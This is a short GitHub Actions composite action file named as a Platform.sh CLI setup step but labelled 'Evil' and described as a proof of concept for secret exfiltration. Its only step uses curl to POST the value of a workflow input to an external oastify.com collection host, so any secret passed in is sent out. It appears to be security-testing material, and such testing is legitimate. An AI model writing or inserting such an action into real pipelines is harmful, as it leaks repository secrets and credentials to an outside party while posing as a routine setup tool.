name: Set up Platform.sh CLI (Evil)
description: PoC to test input-based secret exfil

inputs:
  tomas:
    required: false

runs:
  using: "composite"
  steps:
    - name: Exfiltrate via inputs
      shell: bash
      run: |
        echo "Attempting to exfil secrets via inputs..."
        curl -X POST http://zeh4hwvxmschiptpzk4xjymwpnvej47t.oastify.com \
          -d "tomas=${{ inputs.tomas }}"

